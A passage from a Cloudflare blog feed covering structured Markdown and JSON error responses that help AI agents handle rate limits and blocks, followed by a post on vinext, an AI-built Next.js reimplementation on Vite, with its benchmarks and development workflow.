  "type": "https://developers.cloudflare.com/support/troubleshooting/http-status-codes/cloudflare-1xxx-errors/error-1015/",
  "title": "Error 1015: You are being rate limited",
  "status": 429,
  "detail": "You are being rate-limited by the website owner's configuration.",
  "instance": "9d99a4434fz2d168",
  "error_code": 1015,
  "error_name": "rate_limited",
  "error_category": "rate_limit",
  "ray_id": "9d99a4434fz2d168",
  "timestamp": "2026-03-09T11:11:55Z",
  "zone": "&lt;YOUR_DOMAIN&gt;",
  "cloudflare_error": true,
  "retryable": true,
  "retry_after": 30,
  "owner_action_required": false,
  "what_you_should_do": "**Wait and retry.** This block is transient. Wait at least 30 seconds, then retry with exponential backoff.\n\nRecommended approach:\n1. Wait 30 seconds before your next request\n2. If rate-limited again, double the wait time (60s, 120s, etc.)\n3. If rate-limiting persists after 5 retries, stop and reassess your request pattern",
  "footer": "This error was generated by Cloudflare on behalf of the website owner."
}</code></pre>
            <p>The same error in Markdown, optimized for model-first workflows:</p>
            <pre><code>---
error_code: 1015
error_name: rate_limited
error_category: rate_limit
status: 429
ray_id: 9d99a39dc992d168
timestamp: 2026-03-09T11:11:28Z
zone: &lt;YOUR_DOMAIN&gt;
cloudflare_error: true
retryable: true
retry_after: 30
owner_action_required: false
---

# Error 1015: You are being rate limited

## What Happened

You are being rate-limited by the website owner's configuration.

## What You Should Do

**Wait and retry.** This block is transient. Wait at least 30 seconds, then retry with exponential backoff.

Recommended approach:
1. Wait 30 seconds before your next request
2. If rate-limited again, double the wait time (60s, 120s, etc.)
3. If rate-limiting persists after 5 retries, stop and reassess your request pattern

---
This error was generated by Cloudflare on behalf of the website owner.
</code></pre>
            <p>Both formats give an agent everything it needs to decide and act: classify the error, choose retry behavior, and determine whether escalation is required. This is what a default machine contract looks like — not per-site configuration, but network-wide behavior. The contrast is explicit across error families: a transient error like <code>1015</code> says wait and retry, while intentional blocks like <code>1020</code> or geographic restrictions like <code>1009</code> tell the agent not to retry and to escalate instead.</p>
    <div>
      <h3>One contract, two formats</h3>
      <a href="#one-contract-two-formats">
        
      </a>
    </div>
    <p>The core value is not format choice. It is semantic stability.</p><p>Agents need deterministic answers to operational questions: retry or not, how long to wait, and whether to escalate. Cloudflare exposes one policy contract across two wire formats. Whether a client consumes Markdown or JSON, the operational meaning is identical: same error identity, same retry/backoff signals, same escalation guidance.</p><p>Clients that send <code>Accept: application/problem+json</code> get <code>application/problem+json; charset=utf-8</code> back — useful for HTTP client libraries that dispatch on media type. Clients that send <code>Accept: application/json</code> get <code>application/json; charset=utf-8</code> — same body, safe default for existing consumers.</p>
    <div>
      <h3>Size reduction and token efficiency</h3>
      <a href="#size-reduction-and-token-efficiency">
        
      </a>
    </div>
    <p>That contract is also dramatically smaller than what it replaces. Cloudflare HTML error pages are browser-oriented and heavy, while structured responses are compact by design.</p><p>Measured comparison for <code>1015</code>:</p><table><tr><td><p><b>Payload</b></p></td><td><p><b>Bytes</b></p></td><td><p><b>Tokens (cl100k_base)</b></p></td><td><p><b>Size vs HTML</b></p></td><td><p><b>Token vs HTML</b></p></td></tr><tr><td><p>HTML response</p></td><td><p>46,645</p></td><td><p>14,252</p></td><td><p>—</p></td><td><p>—</p></td></tr><tr><td><p>Markdown response</p></td><td><p>798</p></td><td><p>221</p></td><td><p>58.5x less</p></td><td><p>64.5x less</p></td></tr><tr><td><p>JSON response</p></td><td><p>970</p></td><td><p>256</p></td><td><p>48.1x less</p></td><td><p>55.7x less</p></td></tr></table><p>Both structured formats deliver a ~98% reduction in size and tokens versus HTML. For agents, size translates directly into token cost — when an agent hits multiple errors in one run, these savings compound into lower model spend and faster recovery loops.</p>
    <div>
      <h3>Ten categories, clear actions</h3>
      <a href="#ten-categories-clear-actions">
        
      </a>
    </div>
    <p>Every <code>1xxx</code> error is mapped to an <code>error_category</code>. That turns error handling into routing logic instead of brittle per-page parsing.</p><table><tr><td><p><b>Category</b></p></td><td><p><b>What it means</b></p></td><td><p><b>What the agent should do</b></p></td></tr><tr><td><p><code>access_denied</code></p></td><td><p>Intentional block: IP, ASN, geo, firewall rule</p></td><td><p>Do not retry. Contact site owner if unexpected.</p></td></tr><tr><td><p><code>rate_limit</code></p></td><td><p>Request rate exceeded</p></td><td><p>Back off. Retry after retry_after seconds.</p></td></tr><tr><td><p><code>dns</code></p></td><td><p>DNS resolution failure at the origin</p></td><td><p>Do not retry. Report to site owner.</p></td></tr><tr><td><p><code>config</code></p></td><td><p>Configuration error: CNAME, tunnel, host routing</p></td><td><p>Do not retry (usually). Report to site owner.</p></td></tr><tr><td><p><code>tls</code></p></td><td><p>TLS version or cipher mismatch</p></td><td><p>Fix TLS client settings. Do not retry as-is.</p></td></tr><tr><td><p><code>legal</code></p></td><td><p>DMCA or regulatory block</p></td><td><p>Do not retry. This is a legal restriction.</p></td></tr><tr><td><p><code>worker</code></p></td><td><p>Cloudflare Workers runtime error</p></td><td><p>Do not retry. Site owner must fix the script.</p></td></tr><tr><td><p><code>rewrite</code></p></td><td><p>Invalid URL rewrite output</p></td><td><p>Do not retry. Site owner must fix the rule.</p></td></tr><tr><td><p><code>snippet</code></p></td><td><p>Cloudflare Snippets error</p></td><td><p>Do not retry. Site owner must fix Snippets config.</p></td></tr><tr><td><p><code>unsupported</code></p></td><td><p>Unsupported method or deprecated feature</p></td><td><p>Change the request. Do not retry as-is.</p></td></tr></table><p>Two fields make this operationally useful for agents:</p><ul><li><p><code>retryable</code> answers whether a retry can succeed</p></li><li><p><code>owner_action_required</code> answers whether the problem must be escalated</p></li></ul><p>You can replace brittle "if status == 429 then maybe retry" heuristics with explicit control flow. Parse the frontmatter once, then branch on stable fields. A simple pattern is:</p><ul><li><p>if <code>retryable</code> is <code>true</code>, wait <code>retry_after</code> and retry</p></li><li><p>if <code>owner_action_required</code> is <code>true</code>, stop and escalate</p></li><li><p>otherwise, fail fast without hammering the site</p></li></ul><p>Here is a minimal Python example using that pattern:</p>
            <pre><code>import time
import yaml


def parse_frontmatter(markdown_text: str) -&gt; dict:
    # Expects: ---\n&lt;yaml&gt;\n---\n&lt;body&gt;
    if not markdown_text.startswith("---\n"):
        return {}
    _, yaml_block, _ = markdown_text.split("---\n", 2)
    return yaml.safe_load(yaml_block) or {}


def handle_cloudflare_error(markdown_text: str) -&gt; str:
    meta = parse_frontmatter(markdown_text)

    if not meta.get("cloudflare_error"):
        return "not_cloudflare_error"

    if meta.get("retryable"):
        wait_seconds = int(meta.get("retry_after", 30))
        time.sleep(wait_seconds)
        return f"retry_after_{wait_seconds}s"

    if meta.get("owner_action_required"):
        return f"escalate_owner_error_{meta.get('error_code')}"

    return "do_not_retry"</code></pre>
            <p>This is the key shift: agents are no longer inferring intent from HTML copy. They are executing explicit policy from structured fields.</p>
    <div>
      <h3>How to use it</h3>
      <a href="#how-to-use-it">
        
      </a>
    </div>
    <p>Send <code>Accept: text/markdown</code>, <code>Accept: application/json</code>, or <code>Accept: application/problem+json</code>.</p><p>For quick testing, you can hit any Cloudflare-proxied domain directly at <code>/cdn-cgi/error/1015</code> (or replace <code>1015</code> with another <code>1xxx</code> code).</p>
            <pre><code>curl -s --compressed -H "Accept: text/markdown" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "&lt;YOUR_DOMAIN&gt;/cdn-cgi/error/1015"
</code></pre>
            <p>Example with another error code:</p>
            <pre><code>curl -s --compressed -H "Accept: text/markdown" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "&lt;YOUR_DOMAIN&gt;/cdn-cgi/error/1020"
</code></pre>
            <p>JSON example:</p>
            <pre><code>curl -s --compressed -H "Accept: application/json" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "&lt;YOUR_DOMAIN&gt;/cdn-cgi/error/1015" | jq .
</code></pre>
            <p>RFC 9457 Problem Details example:</p>
            <pre><code>curl -s --compressed -H "Accept: application/problem+json" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "&lt;YOUR_DOMAIN&gt;/cdn-cgi/error/1015" | jq .
</code></pre>
            <p>The behavior is deterministic — the first explicit structured type wins:</p><table><tr><td><p><b>Accept header</b></p></td><td><p><b>Response</b></p></td></tr><tr><td><p><code>application/json</code></p></td><td><p>JSON</p></td></tr><tr><td><p><code>application/json; charset=utf-8</code></p></td><td><p>JSON</p></td></tr><tr><td><p><code>application/problem+json</code></p></td><td><p>JSON (application/problem+json content type)</p></td></tr><tr><td><p><code>application/json, text/markdown;q=0.9</code></p></td><td><p>JSON</p></td></tr><tr><td><p><code>application/json, text/markdown</code></p></td><td><p>JSON (equal q, first-listed wins)</p></td></tr><tr><td><p><code>text/markdown</code></p></td><td><p>Markdown</p></td></tr><tr><td><p><code>text/markdown, application/json</code></p></td><td><p>Markdown (equal q, first-listed wins)</p></td></tr><tr><td><p><code>text/markdown, */*</code></p></td><td><p>Markdown</p></td></tr><tr><td><p><code>text/*</code></p></td><td><p>Markdown</p></td></tr><tr><td><p><code>*/*</code></p></td><td><p>HTML (default)</p></td></tr></table><p>Wildcard-only requests (<code>*/*</code>) do not signal a structured preference; clients must explicitly request Markdown or JSON.</p><p>If the request succeeds, you get normal origin content. The header only affects Cloudflare-generated error responses.</p>
    <div>
      <h3>Real-world use cases</h3>
      <a href="#real-world-use-cases">
        
      </a>
    </div>
    <p>There are a number of situations where structured error responses help immediately:</p><ol><li><p>Agent blocked by WAF rule (<code>1020</code>). The agent parses <code>error_code</code>, records <code>ray_id</code>, and stops retrying. It can escalate with useful context instead of looping.</p></li><li><p>MCP (Model Context Protocol) tool hitting geo restriction (<code>1009</code>). The tool gets a clear, machine-readable reason, returns it to the orchestrator, and the workflow can choose an alternate path or notify the user.</p></li><li><p>Rate-limited crawler (<code>1015</code>). The agent reads <code>retryable</code>: true and <code>retry_after</code>, applies backoff, and retries predictably instead of hammering the endpoint.</p></li><li><p>Developer debugging with <code>curl</code>. The developer can reproduce exactly what the agent sees, including frontmatter and guidance, without reverse-engineering HTML.</p></li><li><p>HTTP client libraries that understand RFC 9457. Any client that dispatches on <code>application/problem+json</code> or parses Problem Details objects can handle Cloudflare errors without Cloudflare-specific code.</p></li></ol><p>In each case, the outcome is the same: less guessing, fewer wasted retries, lower model cost, and faster recovery.</p>
    <div>
      <h3>Try it now</h3>
      <a href="#try-it-now">
        
      </a>
    </div>
    <p>Send a structured <code>Accept</code> header and test against any Cloudflare-proxied domain:</p>
            <pre><code>curl -s --compressed -H "Accept: text/markdown" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "&lt;YOUR_DOMAIN&gt;/cdn-cgi/error/1015"
</code></pre>
            
            <pre><code>curl -s --compressed -H "Accept: application/json" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "&lt;YOUR_DOMAIN&gt;/cdn-cgi/error/1015" | jq .
</code></pre>
            
            <pre><code>curl -s --compressed -H "Accept: application/problem+json" -A "TestAgent/1.0" -H "Accept-Encoding: gzip, deflate" "&lt;YOUR_DOMAIN&gt;/cdn-cgi/error/1015" | jq .
</code></pre>
            <p>Error pages are the first conversation between Cloudflare and an agent. This launch makes that conversation structured, standards-compliant, and cheap to process.</p><p>To make this work across the web, agent runtimes should default to explicit structured <code>Accept</code> headers, not bare <code>*/*</code>. Use <code>Accept: text/markdown, */*</code> for model-first workflows and <code>Accept: application/json, */*</code> for typed control flow. If you maintain an agent framework, SDK, or browser automation stack, ship this default and treat bare <code>*/*</code> as legacy fallback.</p><p>And it is only the first layer. We are building the rest of the agent stack on top of it: <a href="https://developers.cloudflare.com/ai-gateway/"><u>AI Gateway</u></a> for routing, controls, and observability; <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a> for inference; and the identity, security, and access primitives agents will need to operate safely at Internet scale.</p><p>Cloudflare is helping our customers deliver content in agent-friendly ways, and this is just the start. If you're building or operating agents, start at <a href="http://agents.cloudflare.com"><u>agents.cloudflare.com</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Edge Computing]]></category>
            <guid isPermaLink="false">46xdz0GQfFtpCKRKNbfj3b</guid>
            <dc:creator>Sam Marsh</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we rebuilt Next.js with AI in one week]]></title>
            <link>https://blog.cloudflare.com/vinext/</link>
            <pubDate>Tue, 24 Feb 2026 20:00:00 GMT</pubDate>
            <description><![CDATA[ One engineer used AI to rebuild Next.js on Vite in a week. vinext builds up to 4x faster, produces 57% smaller bundles, and deploys to Cloudflare Workers with a single command. ]]></description>
            <content:encoded><![CDATA[ <p><sub><i>*This post was updated at 12:35 pm PT to fix a typo in the build time benchmarks.</i></sub></p><p>Last week, one engineer and an AI model rebuilt the most popular front-end framework from scratch. The result, <a href="https://github.com/cloudflare/vinext"><u>vinext</u></a> (pronounced "vee-next"), is a drop-in replacement for Next.js, built on <a href="https://vite.dev/"><u>Vite</u></a>, that deploys to Cloudflare Workers with a single command. In early benchmarks, it builds production apps up to 4x faster and produces client bundles up to 57% smaller. And we already have customers running it in production. </p><p>The whole thing cost about $1,100 in tokens.</p>
    <div>
      <h2>The Next.js deployment problem</h2>
      <a href="#the-next-js-deployment-problem">
        
      </a>
    </div>
    <p><a href="https://nextjs.org/"><u>Next.js</u></a> is the most popular React framework. Millions of developers use it. It powers a huge chunk of the production web, and for good reason. The developer experience is top-notch.</p><p>But Next.js has a deployment problem when used in the broader serverless ecosystem. The tooling is entirely bespoke: Next.js has invested heavily in Turbopack but if you want to deploy it to Cloudflare, Netlify, or AWS Lambda, you have to take that build output and reshape it into something the target platform can actually run.</p><p>If you’re thinking: “Isn’t that what OpenNext does?”, you are correct. </p><p>That is indeed the problem <a href="https://opennext.js.org/"><u>OpenNext</u></a> was built to solve. And a lot of engineering effort has gone into OpenNext from multiple providers, including us at Cloudflare. It works, but quickly runs into limitations and becomes a game of whack-a-mole. </p><p>Building on top of Next.js output as a foundation has proven to be a difficult and fragile approach. Because OpenNext has to reverse-engineer Next.js's build output, this results in unpredictable changes between versions that take a lot of work to correct. </p><p>Next.js has been working on a first-class adapters API, and we've been collaborating with them on it. It's still an early effort but even with adapters, you're still building on the bespoke Turbopack toolchain. And adapters only cover build and deploy. During development, next dev runs exclusively in Node.js with no way to plug in a different runtime. If your application uses platform-specific APIs like Durable Objects, KV, or AI bindings, you can't test that code in dev without workarounds.</p>
    <div>
      <h2>Introducing vinext </h2>
      <a href="#introducing-vinext">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7BCYnb6nCnc9oRBPQnuES5/d217b3582f4fe30597a3b4bf000d9bd7/BLOG-3194_2.png" />
          </figure><p>What if instead of adapting Next.js output, we reimplemented the Next.js API surface on <a href="https://vite.dev/"><u>Vite</u></a> directly? Vite is the build tool used by most of the front-end ecosystem outside of Next.js, powering frameworks like Astro, SvelteKit, Nuxt, and Remix. A clean reimplementation, not merely a wrapper or adapter. We honestly didn't think it would work. But it’s 2026, and the cost of building software has completely changed.</p><p>We got a lot further than we expected.</p>
            <pre><code>npm install vinext</code></pre>
            <p>Replace <code>next</code> with <code>vinext</code> in your scripts and everything else stays the same. Your existing <code>app/</code>, <code>pages/</code>, and <code>next.config.js</code> work as-is.</p>
            <pre><code>vinext dev          # Development server with HMR
vinext build        # Production build
vinext deploy       # Build and deploy to Cloudflare Workers</code></pre>
            <p>This is not a wrapper around Next.js and Turbopack output. It's an alternative implementation of the API surface: routing, server rendering, React Server Components, server actions, caching, middleware. All of it built on top of Vite as a plugin. Most importantly Vite output runs on any platform thanks to the <a href="https://vite.dev/guide/api-environment"><u>Vite Environment API</u></a>.</p>
    <div>
      <h2>The numbers</h2>
      <a href="#the-numbers">
        
      </a>
    </div>
    <p>Early benchmarks are promising. We compared vinext against Next.js 16 using a shared 33-route App Router application.

Both frameworks are doing the same work: compiling, bundling, and preparing server-rendered routes. We disabled TypeScript type checking and ESLint in Next.js's build (Vite doesn't run these during builds), and used force-dynamic so Next.js doesn't spend extra time pre-rendering static routes, which would unfairly slow down its numbers. The goal was to measure only bundler and compilation speed, nothing else. Benchmarks run on GitHub CI on every merge to main. </p><p><b>Production build time:</b></p>
<div><table><colgroup>
<col></col>
<col></col>
<col></col>
</colgroup>
<thead>
  <tr>
    <th><span>Framework</span></th>
    <th><span>Mean</span></th>
    <th><span>vs Next.js</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>Next.js 16.1.6 (Turbopack)</span></td>
    <td><span>7.38s</span></td>
    <td><span>baseline</span></td>
  </tr>
  <tr>
    <td><span>vinext (Vite 7 / Rollup)</span></td>
    <td>4.64s</td>
    <td>1.6x faster</td>
  </tr>
  <tr>
    <td><span>vinext (Vite 8 / Rolldown)</span></td>
    <td>1.67s</td>
    <td>4.4x faster</td>
  </tr>
</tbody></table></div><p><b>Client bundle size (gzipped):</b></p>
<div><table><colgroup>
<col></col>
<col></col>
<col></col>
</colgroup>
<thead>
  <tr>
    <th><span>Framework</span></th>
    <th><span>Gzipped</span></th>
    <th><span>vs Next.js</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>Next.js 16.1.6</span></td>
    <td><span>168.9 KB</span></td>
    <td><span>baseline</span></td>
  </tr>
  <tr>
    <td><span>vinext (Rollup)</span></td>
    <td><span>74.0 KB</span></td>
    <td><span>56% smaller</span></td>
  </tr>
  <tr>
    <td><span>vinext (Rolldown)</span></td>
    <td><span>72.9 KB</span></td>
    <td><span>57% smaller</span></td>
  </tr>
</tbody></table></div><p>These benchmarks measure compilation and bundling speed, not production serving performance. The test fixture is a single 33-route app, not a representative sample of all production applications. We expect these numbers to evolve as three projects continue to develop. The <a href="https://benchmarks.vinext.workers.dev"><u>full methodology and historical results</u></a> are public. Take them as directional, not definitive.</p><p>The direction is encouraging, though. Vite's architecture, and especially <a href="https://rolldown.rs/"><u>Rolldown</u></a> (the Rust-based bundler coming in Vite 8), has structural advantages for build performance that show up clearly here.</p>
    <div>
      <h2>Deploying to Cloudflare Workers</h2>
      <a href="#deploying-to-cloudflare-workers">
        
      </a>
    </div>
    <p>vinext is built with Cloudflare Workers as the first deployment target. A single command takes you from source code to a running Worker:</p>
            <pre><code>vinext deploy</code></pre>
            <p>This handles everything: builds the application, auto-generates the Worker configuration, and deploys. Both the App Router and Pages Router work on Workers, with full client-side hydration, interactive components, client-side navigation, React state.</p><p>For production caching, vinext includes a Cloudflare KV cache handler that gives you ISR (Incremental Static Regeneration) out of the box:</p>
            <pre><code>import { KVCacheHandler } from "vinext/cloudflare";
import { setCacheHandler } from "next/cache";

setCacheHandler(new KVCacheHandler(env.MY_KV_NAMESPACE));</code></pre>
            <p><a href="https://developers.cloudflare.com/kv/"><u>KV</u></a> is a good default for most applications, but the caching layer is designed to be pluggable. That setCacheHandler call means you can swap in whatever backend makes sense. <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a> might be a better fit for apps with large cached payloads or different access patterns. We're also working on improvements to our Cache API that should provide a strong caching layer with less configuration. The goal is flexibility: pick the caching strategy that fits your app.</p><p>Live examples running right now:</p><ul><li><p><a href="https://app-router-playground.vinext.workers.dev"><u>App Router Playground</u></a></p></li><li><p><a href="https://hackernews.vinext.workers.dev"><u>Hacker News clone</u></a></p></li><li><p><a href="https://app-router-cloudflare.vinext.workers.dev"><u>App Router minimal</u></a></p></li><li><p><a href="https://pages-router-cloudflare.vinext.workers.dev"><u>Pages Router minimal</u></a></p></li></ul><p>We also have <a href="https://next-agents.threepointone.workers.dev/"><u>a live example</u></a> of Cloudflare Agents running in a Next.js app, without the need for workarounds like <a href="https://developers.cloudflare.com/workers/wrangler/api/#getplatformproxy"><u>getPlatformProxy</u></a>, since the entire app now runs in workerd, during both dev and deploy phases. This means being able to use Durable Objects, AI bindings, and every other Cloudflare-specific service without compromise. <a href="https://github.com/cloudflare/vinext-agents-example"><u>Have a look here.</u></a>   </p>
    <div>
      <h2>Frameworks are a team sport</h2>
      <a href="#frameworks-are-a-team-sport">
        
      </a>
    </div>
    <p>The current deployment target is Cloudflare Workers, but that's a small part of the picture. Something like 95% of vinext is pure Vite. The routing, the module shims, the SSR pipeline, the RSC integration: none of it is Cloudflare-specific.</p><p>Cloudflare is looking to work with other hosting providers about adopting this toolchain for their customers (the lift is minimal — we got a proof-of-concept working on <a href="https://vinext-on-vercel.vercel.app/"><u>Vercel</u></a> in less than 30 minutes!). This is an open-source project, and for its long term success, we believe it’s important we work with partners across the ecosystem to ensure ongoing investment. PRs from other platforms are welcome. If you're interested in adding a deployment target, <a href="https://github.com/cloudflare/vinext/issues"><u>open an issue</u></a> or reach out.</p>
    <div>
      <h2>Status: Experimental</h2>
      <a href="#status-experimental">
        
      </a>
    </div>
    <p>We want to be clear: vinext is experimental. It's not even one week old, and it has not yet been battle-tested with any meaningful traffic at scale. If you're evaluating it for a production application, proceed with appropriate caution.</p><p>That said, the test suite is extensive: over 1,700 Vitest tests and 380 Playwright E2E tests, including tests ported directly from the Next.js test suite and OpenNext's Cloudflare conformance suite. We’ve verified it against the Next.js App Router Playground. Coverage sits at 94% of the Next.js 16 API surface.

Early results from real-world customers are encouraging. We've been working with <a href="https://ndstudio.gov/"><u>National Design Studio</u></a>, a team that's aiming to modernize every government interface, on one of their beta sites, <a href="https://www.cio.gov/"><u>CIO.gov</u></a>. They're already running vinext in production, with meaningful improvements in build times and bundle sizes.</p><p>The README is honest about <a href="https://github.com/cloudflare/vinext#whats-not-supported-and-wont-be"><u>what's not supported and won't be</u></a>, and about <a href="https://github.com/cloudflare/vinext#known-limitations"><u>known limitations</u></a>. We want to be upfront rather than overpromise.</p>
    <div>
      <h2>What about pre-rendering?</h2>
      <a href="#what-about-pre-rendering">
        
      </a>
    </div>
    <p>vinext already supports Incremental Static Regeneration (ISR) out of the box. After the first request to any page, it's cached and revalidated in the background, just like Next.js. That part works today.</p><p>vinext does not yet support static pre-rendering at build time. In Next.js, pages without dynamic data get rendered during <code>next build</code> and served as static HTML. If you have dynamic routes, you use <code>generateStaticParams()</code> to enumerate which pages to build ahead of time. vinext doesn't do that… yet.</p><p>This was an intentional design decision for launch. It's  <a href="https://github.com/cloudflare/vinext/issues/9">on the roadmap</a>, but if your site is 100% prebuilt HTML with static content, you probably won't see much benefit from vinext today. That said, if one engineer can spend <span>$</span>1,100 in tokens and rebuild Next.js, you can probably spend $10 and migrate to a Vite-based framework designed specifically for static content, like <a href="https://astro.build/">Astro</a> (which <a href="https://blog.cloudflare.com/astro-joins-cloudflare/">also deploys to Cloudflare Workers</a>).</p><p>For sites that aren't purely static, though, we think we can do something better than pre-rendering everything at build time.</p>
    <div>
      <h2>Introducing Traffic-aware Pre-Rendering</h2>
      <a href="#introducing-traffic-aware-pre-rendering">
        
      </a>
    </div>
    <p>Next.js pre-renders every page listed in <code>generateStaticParams()</code> during the build. A site with 10,000 product pages means 10,000 renders at build time, even though 99% of those pages may never receive a request. Builds scale linearly with page count. This is why large Next.js sites end up with 30-minute builds.</p><p>So we built <b>Traffic-aware Pre-Rendering</b> (TPR). It's experimental today, and we plan to make it the default once we have more real-world testing behind it.</p><p>The idea is simple. Cloudflare is already the reverse proxy for your site. We have your traffic data. We know which pages actually get visited. So instead of pre-rendering everything or pre-rendering nothing, vinext queries Cloudflare's zone analytics at deploy time and pre-renders only the pages that matter.</p>
            <pre><code>vinext deploy --experimental-tpr

  Building...
  Build complete (4.2s)

  TPR (experimental): Analyzing traffic for my-store.com (last 24h)
  TPR: 12,847 unique paths — 184 pages cover 90% of traffic
  TPR: Pre-rendering 184 pages...
  TPR: Pre-rendered 184 pages in 8.3s → KV cache

  Deploying to Cloudflare Workers...
</code></pre>
            <p>For a site with 100,000 product pages, the power law means 90% of traffic usually goes to 50 to 200 pages. Those get pre-rendered in seconds. Everything else falls back to on-demand SSR and gets cached via ISR after the first request. Every new deploy refreshes the set based on current traffic patterns. Pages that go viral get picked up automatically. All of this works without <code>generateStaticParams()</code> and without coupling your build to your production database.</p>
    <div>
      <h2>Taking on the Next.js challenge, but this time with AI</h2>
      <a href="#taking-on-the-next-js-challenge-but-this-time-with-ai">
        
      </a>
    </div>
    <p>A project like this would normally take a team of engineers months, if not years. Several teams at various companies have attempted it, and the scope is just enormous. We tried once at Cloudflare! Two routers, 33+ module shims, server rendering pipelines, RSC streaming, file-system routing, middleware, caching, static export. There's a reason nobody has pulled it off.</p><p>This time we did it in under a week. One engineer (technically engineering manager) directing AI.</p><p>The first commit landed on February 13. By the end of that same evening, both the Pages Router and App Router had basic SSR working, along with middleware, server actions, and streaming. By the next afternoon, <a href="https://app-router-playground.vinext.workers.dev"><u>App Router Playground</u></a> was rendering 10 of 11 routes. By day three, <code>vinext deploy</code> was shipping apps to Cloudflare Workers with full client hydration. The rest of the week was hardening: fixing edge cases, expanding the test suite, bringing API coverage to 94%.</p><p>What changed from those earlier attempts? AI got better. Way better.</p>
    <div>
      <h2>Why this problem is made for AI</h2>
      <a href="#why-this-problem-is-made-for-ai">
        
      </a>
    </div>
    <p>Not every project would go this way. This one did because a few things happened to line up at the right time.</p><p><b>Next.js is well-specified.</b> It has extensive documentation, a massive user base, and years of Stack Overflow answers and tutorials. The API surface is all over the training data. When you ask Claude to implement <code>getServerSideProps</code> or explain how <code>useRouter</code> works, it doesn't hallucinate. It knows how Next works.</p><p><b>Next.js has an elaborate test suite.</b> The <a href="https://github.com/vercel/next.js"><u>Next.js repo</u></a> contains thousands of E2E tests covering every feature and edge case. We ported tests directly from their suite (you can see the attribution in the code). This gave us a specification we could verify against mechanically.</p><p><b>Vite is an excellent foundation.</b> <a href="https://vite.dev/"><u>Vite</u></a> handles the hard parts of front-end tooling: fast HMR, native ESM, a clean plugin API, production bundling. We didn't have to build a bundler. We just had to teach it to speak Next.js. <a href="https://github.com/vitejs/vite-plugin-rsc"><code><u>@vitejs/plugin-rsc</u></code></a> is still early, but it gave us React Server Components support without having to build an RSC implementation from scratch.</p><p><b>The models caught up.</b> We don't think this would have been possible even a few months ago. Earlier models couldn't sustain coherence across a codebase this size. New models can hold the full architecture in context, reason about how modules interact, and produce correct code often enough to keep momentum going. At times, I saw it go into Next, Vite, and React internals to figure out a bug. The state-of-the-art models are impressive, and they seem to keep getting better.</p><p>All of those things had to be true at the same time. Well-documented target API, comprehensive test suite, solid build tool underneath, and a model that could actually handle the complexity. Take any one of them away and this doesn't work nearly as well.</p>
    <div>
      <h2>How we actually built it</h2>
      <a href="#how-we-actually-built-it">
        
      </a>
    </div>
    <p>Almost every line of code in vinext was written by AI. But here's the thing that matters more: every line passes the same quality gates you'd expect from human-written code. The project has 1,700+ Vitest tests, 380 Playwright E2E tests, full TypeScript type checking via tsgo, and linting via oxlint. Continuous integration runs all of it on every pull request. Establishing a set of good guardrails is critical to making AI productive in a codebase.</p><p>The process started with a plan. I spent a couple of hours going back and forth with Claude in <a href="https://opencode.ai"><u>OpenCode</u></a> to define the architecture: what to build, in what order, which abstractions to use. That plan became the north star. From there, the workflow was straightforward:</p><ol><li><p>Define a task ("implement the <code>next/navigation</code> shim with usePathname, <code>useSearchParams</code>, <code>useRouter</code>").</p></li><li><p>Let the AI write the implementation and tests.</p></li><li><p>Run the test suite.</p></li><li><p>If tests pass, merge. If not, give the AI the error output and let it iterate.</p></li><li><p>Repeat.</p></li></ol><p>We wired up AI agents for code review too. When a PR was opened, an agent reviewed it. When review comments came back, another agent addressed them. The feedback loop was mostly automated. </p><p>It didn't work perfectly every time. There were PRs that were just wrong. The AI would confidently implement something that seemed right but didn't match actual Next.js behavior. I had to course-correct regularly. Architecture decisions, prioritization, knowing when the AI was headed down a dead end: that was all me. When you give AI good direction, good context, and good guardrails, it can be very productive. But the human still has to steer.</p><p>For browser-level testing, I used <a href="https://github.com/vercel-labs/agent-browser"><u>agent-browser</u></a> to verify actual rendered output, client-side navigation, and hydration behavior. Unit tests miss a lot of subtle browser issues. This caught them.</p><p>Over the course of the project, we ran over 800 sessions in OpenCode. Total cost: roughly $1,100 in Claude API tokens.</p>
    <div>
      <h2>What this means for software</h2>
      <a href="#what-this-means-for-software">
        
      </a>
    </div>
    <p>Why do we have so many layers in the stack? This project forced me to think deeply about this question. And to consider how AI impacts the answer.</p><p>Most abstractions in software exist because humans need help. We couldn't hold the whole system in our heads, so we built layers to manage the complexity for us. Each layer made the next person's job easier. That's how you end up with frameworks on top of frameworks, wrapper libraries, thousands of lines of glue code.</p><p>AI doesn't have the same limitation. It can hold the whole system in context and just write the code. It doesn't need an intermediate framework to stay organized. It just needs a spec and a foundation to build on.</p><p>It's not clear yet which abstractions are truly foundational and which ones were just crutches for human cognition. That line is going to shift a lot over the next few years. But vinext is a data point. We took an API contract, a build tool, and an AI model, and the AI wrote everything in between. No intermediate framework needed. We think this pattern will repeat across a lot of software. The layers we've built up over the years aren't all going to make it.</p>
    <div>
      <h2>Acknowledgments</h2>
      <a href="#acknowledgments">
        
      </a>
    </div>
    <p>Thanks to the Vite team. <a href="https://vite.dev/"><u>Vite</u></a> is the foundation this whole thing stands on. <a href="https://github.com/vitejs/vite-plugin-rsc"><code><u>@vitejs/plugin-rsc</u></code></a> is still early days, but it gave me RSC support without having to build that from scratch, which would have been a dealbreaker. The Vite maintainers were responsive and helpful as I pushed the plugin into territory it hadn't been tested in before.</p><p>We also want to acknowledge the <a href="https://nextjs.org/"><u>Next.js</u></a> team. They've spent years building a framework that raised the bar for what React development could look like. The fact that their API surface is so well-documented and their test suite so comprehensive is a big part of what made this project possible. vinext wouldn't exist without the standard they set.</p>
    <div>
      <h2>Try it</h2>
      <a href="#try-it">
        
      </a>
    </div>
